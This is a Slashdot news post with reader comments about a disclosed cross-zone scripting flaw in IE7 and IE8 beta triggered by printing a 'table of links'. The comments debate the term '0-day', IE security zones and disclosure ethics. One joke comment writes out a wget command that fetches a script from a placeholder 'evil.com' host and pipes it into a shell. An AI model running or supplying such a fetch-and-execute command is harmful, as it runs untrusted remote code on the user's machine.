Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

IE 7.0/8.0b Code Execution 0-Day Released

kdawson posted more than 6 years ago | from the cross-zone-scripting dept.

Security 131

SecureThroughObscure writes "Security blogger and researcher Nate McFeters blogged about a 0-day exploit affecting IE7 and IE8 beta on XP that was released by noted security researcher Aviv Raff. The flaw is a 'cross-zone scripting' flaw that takes advantage of the fact that printing HTML web pages occurs in the Local Machine Zone in IE rather than in the Internet Zone. Quoting McFeters's post: 'This is currently unpatched and in all of its 0-day glory, so for the time being, beware printing using the "print table of links" option when printing web pages.' McFeters and others will be presenting at Black Hat on the link between cross-site scripting and cross-zone. Rob Carter has been hitting this hard over at his blog, pointing out cross-zone weaknesses in Azureus, uTorrent, and the Eclipse platform."

cancel ×

131 comments

Sorry! There are no comments related to the filter you selected.

0-day (5, Insightful)

Anonymous Coward | more than 6 years ago | (#23432500)

0-day? This term seems to have lots all meaning. Could we please stop using it?

Re:0-day (5, Informative)

Fast Thick Pants (1081517) | more than 6 years ago | (#23432908)

Zero is the answer to the question "How long has the vulnerability that this exploit exploits been patched?" I suppose you could call it a -24 since it probably won't be patched until next month's black Tuesday.

Re:0-day (5, Informative)

tyler.willard (944724) | more than 6 years ago | (#23433302)

That's what the term seems to have mutated into, but it wasn't its original intent.

The whole point of coining the term in the first place was to be able to discuss the unknown; i.e., to be able to assess the potential danger of currently unknown threats. Day-1 refers to disclosure, as such there's no way to talk about a specific 0-day because if you know what it is than it has to at least be day-1.

Sure it's abstract, but it's an important concept for developing security technologies and security procedures.

Between product buzzwords and the abstract nature of the term it's almost lost all meaning.

Re:0-day (-1)

Anonymous Coward | more than 6 years ago | (#23433672)

Actually, the original meaning was the one you said was the "new" meaning. The meaning you cited as original is the marketing fluff you decry. It also applies to warez, as any 0-day is a product that has been cracked/released before the product is actually released for legitimate sales.

Re:0-day (2, Insightful)

tyler.willard (944724) | more than 6 years ago | (#23434100)

No. It wasn't.

The whole "day thing" is about the time between disclosure and patch/signature release. Disclosure starts the clock: Day-1. Day-0 is for talking about the day before disclosure.

Re:0-day (0)

Anonymous Coward | more than 6 years ago | (#23434502)

How can you have - (negative) 0 (zero) ?

Re:0-day (1)

tyler.willard (944724) | more than 6 years ago | (#23434544)

Those aren't minus signs...just dashes; i.e., "Day One"/"Day Zero".

Re:0-day (1)

Fast Thick Pants (1081517) | more than 6 years ago | (#23434944)

Well, a lot of us learn to start counting from zero. I guess this is one for the usenet etymologists

Re:0-day (5, Informative)

Lincolnshire Poacher (1205798) | more than 6 years ago | (#23435180)

> The whole "day thing" is about the time between disclosure and patch/signature release.

Do you have any citation for your assertion?

The term derives from warez "0-day boards". These were populated by the most elite crackers who had cracked software on the 0th-day of release; that is, the software hit the shelves and was already cracked.

Try doing a web search for ``0-day'' with a date threshold prior to, say, 1995. You won't find any hits for your interpretation:

http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=%220-day%22&itag=crv&l=en&ics=utf-8&cs=iso88591&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=&doctype=&dfr%5Bu%5D=on&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1990&dto%5Bu%5D=on&dto%5Bd%5D=16&dto%5Bm%5D=5&dto%5By%5D=1995&hits=10 [alltheweb.com]

Try USENET for certainty ( blocked in work ).

Re:0-day (1)

plague3106 (71849) | more than 6 years ago | (#23434976)

I thought it was the time between the exploit was known and the time an exploit was discovered in the while.

Zero-day (1)

agent (7471) | more than 6 years ago | (#23435182)

Yah, and for small numbers you spell them out.

A Disturbing Trend, But Not Unforeseen... (4, Insightful)

blcamp (211756) | more than 6 years ago | (#23432506)


The more complex the software releases become, the more complex and insidious the exploits of them become also.

Re:A Disturbing Trend, But Not Unforeseen... (1)

TheNetAvenger (624455) | more than 6 years ago | (#23434040)

The more complex the software releases become, the more complex and insidious the exploits of them become also.


Exactly, this is why the most complex OS in history, Vista...

Oh wait, Vista is NOT affected.

(Sorry to the MS Haters Club, especially considering the obscurity of this exploit, compared to ANY of the last 5-10 major flaws found in FireFox.)

I'm not sure that holds up (2, Interesting)

HangingChad (677530) | more than 6 years ago | (#23434050)

The more complex the software releases become, the more complex and insidious the exploits of them become also.

I'm not sure if that statement will hold up to scrutiny. If complex software is the issue, then you'd expect exploits to be consistent across platforms when comparing software of similar complexity. I haven't seen any research supporting that observation. I have seen research that says more complex software will likely contain more coding errors and potential exploits but haven't seen a correlation between software size and actual successful attacks across platforms.

The elephant in the room we ultimately end up dancing around is that we're talking about Windows exploits. The problem is not complex software, the problem is Windows complexity. And Windows API's and their relationship to the software that runs in that environment. Although not all versions of Windows are equally vulnerable, the bottom line is that security in Windows was an after thought. Bolted on rather than pervasive. It's like trying to secure a building designed for open access.

Re:I'm not sure that holds up (1)

plague3106 (71849) | more than 6 years ago | (#23435098)

So you're argument is that some complex code is inherently less secure than other complex code? Sorry, I don't buy it.

As far as security being an after-thought in Windows, that's not true. DOS and the Win9x line weren't designed to be networked, certainly not on an untrusted network. To some extent that was true of the earlier NT line as well; although security was needed and built in, it likely made the assumption that the network was at least somewhat safe.

Modern Windows (I'd say Win2000 and higher) have been designed with networking on an untrusted network in mind, and exploits have been fewer and fewer. It may have taken MS a bit to learn, but it seems they have learned it, especially starting with anything 2003 and higher.

Re:I'm not sure that holds up (1)

moderatorrater (1095745) | more than 6 years ago | (#23435248)

And if we ever have an OS with equal market share we'll be able to evaluate the truth to that statement; for right now, there isn't another OS with the same level of scrutiny from developers, white hat and black hat hackers, so there's very little chance that we'll get a fair comparison.

Amazing (5, Funny)

duplicate-nickname (87112) | more than 6 years ago | (#23432544)

I didn't even know that "Print table of links" was an option for printing in IE until today. My guess is that no one actually uses that feature, and this 0-day exploit affects roughly 0 people.

Re:Amazing (4, Insightful)

CastrTroy (595695) | more than 6 years ago | (#23432652)

Even if you did know about the feature, I'm not sure of it's usefulness. Saveing a spreadsheet of links might be useful, but printing them out? Most URLSs are pretty hard to type back in, and wouldn't be all that useful on paper. Look at the url I'm no right now.

http://it.slashdot.org/comments.pl?sid=555236&op=Reply&threshold=1&commentsort=0&mode=nested&pid=23432544 [slashdot.org]

Why you would want that printed out on a piece of paper is beyond me. It might possibly somewhat work on a PDF printer, but even then, it's use is limited.

Re:Amazing (5, Funny)

Anonymous Coward | more than 6 years ago | (#23432768)

You're forgetting about another MSIE feature, a TWAIN plugin called "Scan table of links".

Re:Amazing (2, Insightful)

Penguinisto (415985) | more than 6 years ago | (#23432766)

Actually, I could see uses for it - but mostly for web designers as an audit tool, and for corporate security types who want to gin up a list of naughty links with which to show the employee and his/her boss.

Now for a real use? Well, maybe one. To save having to scribble them down, you could waste a couple reams of paper printing out, oh, maybe a dozen MS Sharepoint links to an overly-anal supervisor who demands that you include reference links in a printed report.

/P

Solution: Upgrade to Lynx (0)

Anonymous Coward | more than 6 years ago | (#23433286)

If I am understanding this feature correctly, this is precisely what Lynx has been able to do for eons. Just press the 'L' key, then if you must print it, follow up with the 'P' key. Simple.

Welcome to the 1990s, Microsoft!

Proof (5, Insightful)

morgan_greywolf (835522) | more than 6 years ago | (#23432560)

This is proof of what I've said from the beginning -- the whole concept 'zones' in IE is stupid and pointless. Scripts should be allowed only what you allow them, period. You should be able to give permissions down to the individual site (ala NoScript) or even down to the individual script.

Re:Proof (4, Insightful)

ScentCone (795499) | more than 6 years ago | (#23432682)

You should be able to give permissions down to the individual site (ala NoScript) or even down to the individual script.

Look, for most people, the zone idea actually makes sense. Basically, don't trust ANY web site to do the tricksy stuff, but add (for example) your company's intranet to the safe zone, where it can do more desktop-ish stuff. I don't think that's such an awkward concept, and it spares people from having to think through what to allow, or not, on a site by site basis, as they surf. Most people are not this audience. And being able to enforce zone policies at the enterprise level makes a lot of sense, since average users are routinely shown to be spineless and witless: they'll add a poisonous Russian casino spam site to the safe list if that site pops up a tutorial on the steps the have to take to do so, if they want their free emoticon package.

Fiddly, granular systems only work for fiddly, granular people.

Re:Proof (4, Insightful)

morgan_greywolf (835522) | more than 6 years ago | (#23432822)

Pffft. So tell me-- why when I browse a site in the "Internet-zone" and then print a table of links, does that function run in the 'Local Zone'?

I'll tell you why: because it has to. You can't access local devices in the Internet Zone. That's the point. Granular approaches would allow you to print without accidentally giving other permissions to something that shouldn't have them.

At the enterprise level, with something like NoScript, you can just allow entire domains, say intranet.example.com or whatever your organization uses.

Next thing you're gonna tell me is that you think Microsoft should do away with ACLs at the individual file level or even the directory because users are just too stupid to figure that out. They should just have "file zones" and people will just have to stick their files in the right zone. Pffft.

Re:Proof (2, Interesting)

CastrTroy (595695) | more than 6 years ago | (#23432988)

Why would you want special permissions on stuff in your intranet? Couldn't any disgruntled employee set up a webserver on their computer, send out a mass email, telling people to visit the url. and infect a large portion of the computers in the office? If you want special permissions for intranet servers, install your own CA, and let the browser run stuff only signed by that CA.

Re:Proof (1)

morgan_greywolf (835522) | more than 6 years ago | (#23433182)

Not if your Intranet is one domain and your desktop PCs are in another domain, no.

Furthermore, you can make it is as granular as you want. If you want list individual servers, do it, or if you want to control it by CA, do it that way.

Re:Proof (4, Insightful)

CastrTroy (595695) | more than 6 years ago | (#23433474)

And for IE the defaults allow special permissions to your entire intranet. By default all the permissions should be low. There's no reason to grant higher permissions to the entire intranet. If you need something like that set up at your organization, you should have to enable it per server, or per domain.

Re:Proof (1, Funny)

morgan_greywolf (835522) | more than 6 years ago | (#23433666)

Exactly. I knew you'd see it my way.

Re:Proof (1)

Dare nMc (468959) | more than 6 years ago | (#23433794)

Couldn't any disgruntled employee

yes, but which is more likely on a daily basis. When a internal employee attacks and is found, in most company's he gets no more chances to be a ass. When a external attack is found, one of his computers is blocked, a new IP address is all thats needed for him to try again...
At my work their about 10 people with the ability to do this intentionally, of course the more likely is that they got infected from the internet, but if that was blocked, how did that happen again?
of those 10 people at my company with the ability, at least 9 of them would be allowed to serve any of their content on the CA server anyway.

Re:Proof (4, Insightful)

Penguinisto (415985) | more than 6 years ago | (#23433094)

Having actually used the 'Zones' concept recently on IE, I gotta say - it needs work. LOTS of work. The first time someone wants to diddle with a MySpace app and discovers that it won't work until you basically ratchet down the settings --often by hand in the advanced options--? Then couple that with the fact that many websites can pull in parts and content from multiple domains, requiring permissions to be set on each and every one? The whole thing would go out the window and the user would promptly ratchet down the whole WWW.

The concept itself is okay, but the implementation could use a good, solid overhaul.

/P

MySpace (1)

Z34107 (925136) | more than 6 years ago | (#23434262)

he first time someone wants to diddle with a MySpace app and discovers that it won't work until you basically ratchet down the settings --often by hand in the advanced options--

You realize that MySpace is nothing but personal ads for child molesters, right?

If you're running apps from there... be careful

Re:Proof (1)

plague3106 (71849) | more than 6 years ago | (#23435202)

If you're ratcheting down the zone settings for one site, you're NOT using zones correctly. What you'd want to do is add MySpace to your Trusted Sites zone. Now MySpace has the permissions it needs, but the rest of the internet still is kept on higher guard.

Re:Proof (2, Insightful)

MobyDisk (75490) | more than 6 years ago | (#23435442)

People just need to stop using web browsers as a way to control the desktop. If you are in a domain, then the domain administrator can push executable apps, policies, and commands down to the computer. HTML, Javascript, and ActiveX are not tools for administering networks.

Also, having developed desktop applications that used embedded IE, I can tell you the zones system is completely screwed-up. It changes in every version, the APIs are inconsistent across different Windows OS's, and there are crazy loopholes with magical URLs like res:, file:, about:. Then there's exceptions for files on the local hard drive, on the network, on mapped-drives. It's a total mess. All of it really just to support some stupid extensions to Javascript, VBScript, and Microsoft Office - that should never have been added in the first place.

you wrong! (1)

thisispurefud (1061012) | more than 6 years ago | (#23432832)

This is proof of what I've said from the beginning -- the whole concept 'zones' in IE is stupid and pointless.
IE's zones is a very good thing because it gives different level of security based on zones, "internet zone" has an higher security, "local zone" has a lower security, "restricted zone" has the maximum security.

Scripts should be allowed only what you allow them, period.
"allow or cancel" question for each site you visit? are you crazy???? scripting is not dangerous unless there's a flaw in javascript.

You should be able to give permissions down to the individual site
you can do it with IE by putting the sites into the different zones. If you want block a site, just put it in "restricted sites" zone.

(ala NoScript) or even down to the individual script.
"allow or cancel" question for each site you visit? are you crazy???? scripting is not dangerous unless there's a flaw in javascript.

Re:you wrong! (2, Informative)

morgan_greywolf (835522) | more than 6 years ago | (#23433034)

scripting is not dangerous unless there's a flaw in javascript.
If only JavaScript were the only scripting option on IE. Furthermore, JavaScript is one of the primary vectors of attack for Firefox, IE and Opera: what makes you think that an untrusted JavaScript is NOT dangerous?

you can do it with IE by putting the sites into the different zones.
Right. Again, see how NoScript does it. Far easier and more convenient for the user, IMHO.

Re:Proof (1)

evanbd (210358) | more than 6 years ago | (#23432874)

That's insufficient. The danger from scipts comes from sites you *do* trust that get hacked. And if you grant permission per script, how many people are competent to read a script and judge it to be non-malicious? Of those, how many will feel like taking the time for every single script?

NoScript is good, and I use it, but it's far from sufficient to secure the browser against script-based attacks.

Re:Proof (1)

morgan_greywolf (835522) | more than 6 years ago | (#23433068)

NoScript is good, and I use it, but it's far from sufficient to secure the browser against script-based attacks.
I agree. That's why browser makers need to focus on writing secure code. Microsoft has proven time and time again that they are most certainly NOT up to the task.

Re:Proof (1)

nstlgc (945418) | more than 6 years ago | (#23434096)

NoScript is good, and I use it, but it's far from sufficient to secure the browser against script-based attacks.
I agree. That's why browser makers need to focus on writing secure code. Microsoft has proven time and time again that they are most certainly NOT up to the task.
That must be why this vulnerability does not result in code execution on Vista. Didn't you mean to write 'Micro$oft'?

Re:Proof (3, Insightful)

Manip (656104) | more than 6 years ago | (#23432936)

IE or any other modern browser on the market.

You would also have every web developer in the marketplace whining about how IE ignores standards if they pulled the plug on scripting.

Sorry but Zoning in IE is fine. IE 7 is actually a pretty good modern browser and, sure, it isn't perfect but frankly what is?

Re:Proof (3, Informative)

myxiplx (906307) | more than 6 years ago | (#23433032)

I disagree, zones are great, I just wish they'd implemented them better. We use zones as a quick way to enforce across the whole organisation which sites can and can't run scripts. The concept is superb, regular sites can't run scripts, activex, or anything. IT designated 'trusted' sites work fine.

Unfortunately, IE7 has made things a little more difficult:

- Pages with content from various zones no longer show up as 'mixed'. Since the upgrade to IE7, all sites only show the zone of the main URL, however the content runs according to the security zone for it's own source. It makes it almost impossible to work out whether a site can or can't run scripts, and you end up digging into the pages source code to work out what sites need adding to the trusted zones to get pages to work.

- Dynamic scripts added to a page in the 'trusted' zone, execute from the 'internet' zone. This is "by design"... The only workaround is to change the way the code works on the server.

- If you want to lock down the 'internet' zone, you will need to add "about:internet" to your 'trusted' zone

- You will also need to add res://ieframe.dll to your 'trusted' zone

Re:Proof (1)

Fast Thick Pants (1081517) | more than 6 years ago | (#23433184)

I like the zones; I wish Firefox had them. I love NoScript very much, but I wish I didn't have to authorize, say, slashdot.org, to run java apps. I'd rather configure a middle tier that would allow javascript and nothing else.

Re:Proof (1)

Mongoose Disciple (722373) | more than 6 years ago | (#23433818)

In theory I'd agree with that, but Joe Random Intarwebs User isn't savvy enough to make those choices in a semi-smart way.

The zones concept isn't perfect, but for the technically quasi-literate it's generally a better solution to the problem. Golden rule of design: don't build things as though your users are smart, because most of them won't be.

Usage (5, Funny)

Wowsers (1151731) | more than 6 years ago | (#23432594)

People still use Internet Exploder?

yes, I use it (2, Informative)

thisispurefud (1061012) | more than 6 years ago | (#23432928)

People still use Internet Exploder?
yes, I use Internet Explorer in Windows Vista that is the safest browser because it runs with the lowest privileges possibile in a sandbox (IE7 Protected mode). In fact IE7 under Vista is not affected by this flaw i.e. remote code execution is not possible (yet another reason to use Vista and UAC).

Re:yes, I use it (1, Troll)

lloydchristmas759 (1105487) | more than 6 years ago | (#23433144)

Sorry, I could not keep from modding this funny. I am really a GNU/FOSS/Linux geek :P

Re:yes, I use it (2, Funny)

Just Some Guy (3352) | more than 6 years ago | (#23434120)

Sorry, I could not keep from modding this funny.

It didn't take.

Re:yes, I use it (1, Offtopic)

stubear (130454) | more than 6 years ago | (#23434700)

Because he's a fucking dumbass and posted to the same story he moderated. Granted, not being allowed to comment in other threads simply because I've moderated one already is annoyingly stupid but if you moderate you know this, or should, by now.

Re:yes, I use it (-1, Troll)

Anonymous Coward | more than 6 years ago | (#23433154)

(yet another reason to use Vista and UAC).
Another? Was the other reason that you are paid to by M$?

Re:yes, I use it (0, Troll)

A beautiful mind (821714) | more than 6 years ago | (#23433918)

Isn't using Vista for those reasons a bit like being really proud of the great big bolted gate that is sure to keep intruders away, while your fence consists of grass and your house is next to the ultramodern nuclear bunker with built in natural habitat simulation that you have free access to and is frequented by hot women?

Re:yes, I use it (1)

nstlgc (945418) | more than 6 years ago | (#23434160)

Isn't using Vista for those reasons a bit like being really proud of the great big bolted gate that is sure to keep intruders away, while your fence consists of grass and your house is next to the ultramodern nuclear bunker with built in natural habitat simulation that you have free access to and is frequented by hot women?
If by this analogy you mean that Linux is frequented by hot women then wow. Just wow. :-)

Re:yes, I use it (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23434440)

Wow, an IE7-vista moron got modded +5 informative. What an stupid group of mods we had today...

Oh yeah? (3, Funny)

Spy der Mann (805235) | more than 6 years ago | (#23434834)

yes, I use Internet Explorer in Windows Vista that is the safest browser because it runs with the lowest privileges possibile in a sandbox (IE7 Protected mode).


Oh yeah? I use Internet Explorer in XP under non-admin mode in a virtualbox install on Cygwin on a virtualbox install of XP inside a Linux virtualbox install under a SELinux host!

HAH! Take that!

Re:Usage (1)

stubear (130454) | more than 6 years ago | (#23434630)

People still use immature names for Microsoft and their products?

For using IE since 2.X... (3, Funny)

AioKits (1235070) | more than 6 years ago | (#23432666)

I can safely say I did not know this ability even existed. (Don't hurt me! I use FireFox at home! Honest! I even brought some FF t-shirts and the laptop tote.)

Irresponsible disclosure (4, Interesting)

benjymouse (756774) | more than 6 years ago | (#23432670)

The vuln. is probably real, but Aviv Raff notified Microsoft the day before he went public with a "treasure hunt" for this bug (celebrating Isreals 60th birthday); thus the fact that it's a 0day vuln. is entirely his doing. Way to go.

Re:Irresponsible disclosure (4, Insightful)

reset_button (903303) | more than 6 years ago | (#23432828)

Is it better to keep it secret until a patch comes out and hope that nobody else has discovered the vulnerability, or publicize it and let people know not to use this IE feature until it's patched?

Re:Irresponsible disclosure (3, Insightful)

benjymouse (756774) | more than 6 years ago | (#23432914)

In a word? Yes. Ask Mozilla.

Re:Irresponsible disclosure (1)

MMC Monster (602931) | more than 6 years ago | (#23433100)

Agreed. It's considered good form to give the developers at least some notice prior to releasing a security exploit into the wild.

Re:Irresponsible disclosure (0, Troll)

Cal Paterson (881180) | more than 6 years ago | (#23433220)

"Yes" isn't an answer to the question.

Re:Irresponsible disclosure (1)

Gewalt (1200451) | more than 6 years ago | (#23433780)

"Yes" it was.

Re:Irresponsible disclosure (1, Informative)

Cal Paterson (881180) | more than 6 years ago | (#23435492)

Yes doesn't specify which of the options the answerer has selected; it's not a _proper_ answer, even if it's supposed to be witty.

Re:Irresponsible disclosure (0)

Anonymous Coward | more than 6 years ago | (#23435528)

Should you be modded up or down?

In a word, yes.

Not irresponsible disclosure (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23432934)

Yes, it's a remote code execution vulnerability, but it's still not a critical bug. Most importantly, nobody in their right mind uses IE for anything but intranets. Also, nobody in their right mind prints webpages, least of all with a list of links that nobody would type in again anyway. Conlusion: Only morons will be affected by this and it is everybody's responsibility to make sure that stupidity is painful, so this disclosure of this bug is responsible behaviour.

Re:Not irresponsible disclosure (0, Troll)

bcat24 (914105) | more than 6 years ago | (#23433160)

Yes, it's a remote code execution vulnerability, but it's still not a critical bug.
Any remote code execution vulnerability is a critical bug, mkay?

Re:Not irresponsible disclosure (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23433380)

No you lose. Get a life you sucky loser

Re:Not irresponsible disclosure (1)

nstlgc (945418) | more than 6 years ago | (#23434344)

No.

Re:Not irresponsible disclosure (0)

Anonymous Coward | more than 6 years ago | (#23434640)

In that case, I have a critical vulnerability in wget. If I, Umm, "accidentally" type wget -O- http://evil.com/ [evil.com] | /bin/sh, they can execute arbitrary code. PLZ2FIXKTHX.

Re:Irresponsible disclosure (2, Insightful)

Anonymous Coward | more than 6 years ago | (#23432944)

The vuln. is probably real, but Aviv Raff notified Microsoft the day before he went public with a "treasure hunt" for this bug (celebrating Isreals 60th birthday); thus the fact that it's a 0day vuln. is entirely his doing. Way to go.
Yes, as always... blame the whistle blower not the manufacturer of the crap product.

*feeds the troll* (2, Insightful)

Animaether (411575) | more than 6 years ago | (#23433338)

Nobody is blaming Aviv for the existence of the bug. Nobody is blaming Aviv for telling people about the bug.

We *might* be blaming Aviv for telling the world, script kiddies and botnet operators alike, about this bug -before- even notifying the manufacturer of the crap product.

Nor did Aviv wait a reasonable time period for the manufacturer to admit their product's crap state and issue either A. a warning of their own (don't print links) or B. a fix, while providing full credit for discovering the bug to Aviv. Aviv could then still parade his bragging rights around, disclose the exact details, provide proof-of-concept and generally be admired for re-affirming the notion that the product is crap and telling the world in a responsible manner.

Yes, I know, in the time that Aviv would be waiting for the manufacturer to issue a warning / a fix, there could be *others* who also have figured out this vulnerability, and could be actively using it, perhaps on your computer right now! don't look! But given the odds of maybe a handful of people using this for targeted operations vs thousands of script kiddies at work, I'll take my chances with that handful of people in that time period.

Oh, and I consider 3 days to be sufficient a time period for any manufacturer to respond, so anybody who felt like showing how it sometimes takes a manufacturer YEARS before fixing things can just bugger off. I have nothing against disclosure if the manufacturer takes too long - forcing their hand may be the best thing. But having them caught off-guard and scrambling by flat-out announcing it to the world is far more irresponsible than the alternative.

imho.

Re:Irresponsible disclosure (1)

Workaphobia (931620) | more than 6 years ago | (#23432968)

Yeah, really. There's no glory in "finding" a zero day exploit; it's not as if it's inherently more severe or damning than any other flay. But it sure looks better on the headlines.

Slashdot Releases Gay Modding (-1, Troll)

Anonymous Coward | more than 6 years ago | (#23432692)

Complete with gay gangbang scat eroticism from fat losers living in their mothers basement.

Can it be triggered via javascript? (4, Interesting)

foniksonik (573572) | more than 6 years ago | (#23432774)

Can you trigger this behavior in an onload event?

If not it's a rather useless exploit other than as a prank to pull on your secretary... "Hey Sandra... can you print out a table of links for this website?"

5 minutes later "What the F***!"

"HAHAHAHAHAHAHA... I totally got you!"

Re:Can it be triggered via javascript? (4, Informative)

ruiner13 (527499) | more than 6 years ago | (#23433562)

You can certainly trigger the window.print() command in the onload, but setting the properties of the dialog to what is needed for this exploit cannot be done. VBScript may allow further printing options, but I suspect the page would first trigger the standard scripting warnings and the user would still be forced to intervene.

Re:Can it be triggered via javascript? (1)

CastrTroy (595695) | more than 6 years ago | (#23433606)

Well, could you encode a link properly and post it on slashdot? Would it get through the filters? I imagine quite a few people are trying the "print table of links" feature on this very page, simply because nobody has ever used it.

No (4, Informative)

The MAZZTer (911996) | more than 6 years ago | (#23433826)

The best you can do is window.print() to bring up the Print dialog. The user would have to select the "Print table of links" option manually and then print to any printer.

eclipse. (0)

Anonymous Coward | more than 6 years ago | (#23432818)

The eclipse ide?

To view this article on one page... (5, Funny)

Thelasko (1196535) | more than 6 years ago | (#23432854)

please select the printable version.

end sarcasm

Re:To view this article on one page... (1)

The MAZZTer (911996) | more than 6 years ago | (#23433838)

I'd just use Print Preview if I saw something like that, and you can't do the table of links thing in the Preview. Which seems sorta dumb in and of itself, since you can't Preview what it's gonna look like.

I'll be back in a bit ... (1)

tgd (2822) | more than 6 years ago | (#23433122)

Going to print the article so I can read it on the can. I'll post a response about it when I get back.

Re:I'll be back in a bit ... (1)

sunami88 (1074925) | more than 6 years ago | (#23434570)

I thought thats why some of us had PSP's or laptops?

*crickets*... What?

Must we highlight every bug in IE? (2, Insightful)

Anonymous Brave Guy (457657) | more than 6 years ago | (#23433460)

I appreciate the desire to raise awareness, but there's no practical benefit to running this story other than Windows bashing. It'll get patched, the patch will probably ship on some future Tuesday given this is a feature few people use and the risk of exploitation is relatively low, and that'll be that.

In contrast, a far more dangerous bug [debian.org] in the openssl package used by Debian and its derivatives was discovered earlier this week, and doesn't seem to have made the Slashdot home page at all, even though it's probably relevant to a lot of the Slashdot readership and there is real action they can take to fix things. Go figure...

Re:Must we highlight every bug in IE? (5, Informative)

makomk (752139) | more than 6 years ago | (#23433754)

The Debian OpenSSL bug definitely made the Slashdot home page [slashdot.org] ; you must've missed it. (It was posted on Tuesday, a couple of hours after the official announcement - that's quite fast for Slashdot. This story, on the other hand, obviously wasn't considered as important - I read about it elsewhere a day or two ago.)

Re:Must we highlight every bug in IE? (1)

BiggerIsBetter (682164) | more than 6 years ago | (#23433760)

I think the real story is not the bug itself, but the disclosure process in this instance. The Debian OpenSSL mess was front-paged yesterday, and I the OpenSSH "bug" is really just a result of that. Useful link you posted though, particularly with its note about the ssh-vulnkey tool.

Re:Must we highlight every bug in IE? (3, Informative)

dissy (172727) | more than 6 years ago | (#23433798)

In contrast, a far more dangerous bug [debian.org] in the openssl package used by Debian and its derivatives was discovered earlier this week, and doesn't seem to have made the Slashdot home page at all, even though it's probably relevant to a lot of the Slashdot readership and there is real action they can take to fix things. Go figure...
It was on the slashdot front page on Tuesday

http://it.slashdot.org/article.pl?sid=08/05/13/1533212 [slashdot.org]

Re:Must we highlight every bug in IE? (2, Informative)

OMGZombies (1283092) | more than 6 years ago | (#23434400)

In contrast, a far more dangerous bug [debian.org] in the openssl package used by Debian and its derivatives was discovered earlier this week, and doesn't seem to have made the Slashdot home page at all

You mean, this bug? [slashdot.org]

Re:Must we highlight every bug in IE? (2, Funny)

Vexorian (959249) | more than 6 years ago | (#23434494)

God forbid this site bashed windows.

Re:Must we highlight every bug in IE? (0)

Spy der Mann (805235) | more than 6 years ago | (#23434894)

Yes, we must! Because that gets us cautious when using IE on the job, while most people simply don't even know these vulnerabilities exist.

Re:Must we highlight every bug in IE? (0)

Anonymous Coward | more than 6 years ago | (#23434928)

Hey look at me! I'm too fucking stupid to search: http://it.slashdot.org/article.pl?sid=08/05/13/1533212&from=rss

Fanboy fag.

WTF is a "0-day" ? (1)

OneSmartFellow (716217) | more than 6 years ago | (#23433550)

...When are we going to be able to read an article written by anyone other than some jerk-off using buzz-phrases whenever possible.

"0-day" doesn't mean a f$%^&ing thing ! There is no information being transmitted by that phrase, it is empty of any meaning and might as well be a punction mark.

Re:WTF is a "0-day" ? (1)

Artuir (1226648) | more than 6 years ago | (#23433852)

You might know this and were just venting, but for those readers out there that don't know, I'll attempt to clarify.

"0-day" typically is used in the warez/cracking scene. 0-day releases are essentially programs or games or whatnot that are cracked or released for download the same day (or even before) they hit retail shelves. So you've got 0-day games, 0-day cracks, etc. - but in the context the summary uses the term it doesn't really seem like it means anything unless it coincides with a brand new release of IE8. But being a slashdot poster, I didn't even bother to read the summary all the way through, and I sure as hell don't care about IE or vista.

Re:WTF is a "0-day" ? (1)

n1ckml007 (683046) | more than 6 years ago | (#23433962)

Correct "0 day" refers to the release date. "0-day" = previously not publicized http://en.wikipedia.org/wiki/Zero_day_virus [wikipedia.org] for details.

Re:WTF is a "0-day" ? (2, Insightful)

OneSmartFellow (716217) | more than 6 years ago | (#23435030)

From the Wikipedia article cited

A zero-day (or zero-hour) attack or threat is a computer threat that tries to exploit unknown, undisclosed or unpatched computer application vulnerabilities.

So, it's a newly discovered exploit. Can't we use that phrase instead of the uber-lame "0-day"

Re:WTF is a "0-day" ? (0)

Anonymous Coward | more than 6 years ago | (#23434626)

Definitions of zero day on the Web:

        * When a vulnerability in a piece of software is announced at the same time as the relevant exploit code is made available. ...
            www.h-spot.net/threat_glossary.htm

        * Zero Day (2003) is a movie directed by Ben Coccio, about a school shooting much along the lines of the Columbine High School massacre.
            en.wikipedia.org/wiki/Zero Day

        * Zero day or 0-day refers to software, videos, music, or information unlawfully released or obtained on the day of public release. Items obtained pre-release are sometimes labeled Negative day or -day.
            en.wikipedia.org/wiki/Zero day

I'm save... (1)

CRX588 (1002741) | more than 6 years ago | (#23433664)

I can't even find this "print table of links" feature.

YUO FAIL It? (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#23433804)

Th3rei's no

0-day.... (1)

EddyPearson (901263) | more than 6 years ago | (#23434386)

By definition, this is no longer 0-day now is it?

Printer Paper Eating? (1)

cryptodan (1098165) | more than 6 years ago | (#23435010)

So I guess the Russian Business Network will now start developing malware to make printers print non stop costing companies money in paper resupplies?

0 Day on IE (0, Offtopic)

misterhypno (978442) | more than 6 years ago | (#23435322)

Some random thoughts on this:

IE - It Executed

0 Day - 0 Productivity. Nothing works.

So It Executed 0 Day and nothing works and there was no productivity.

And ol Br'er Mac User, he jus' sits back and LAFFS!!

zones are meaningless, useless, stupid, etc. (1)

OrangeTide (124937) | more than 6 years ago | (#23435434)

IE has them and they don't work, Firefox doesn't have it and it still works. I personally think the entire concept is flawed and provides no real security. It is just a UI for managing permissions, which appears to be broken more often than not. Very complicated permission schemes have always been an issue with Windows compared to the Unix world. You average desktop really just needs a few flags for permissions on each object rather than a hierarchy.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?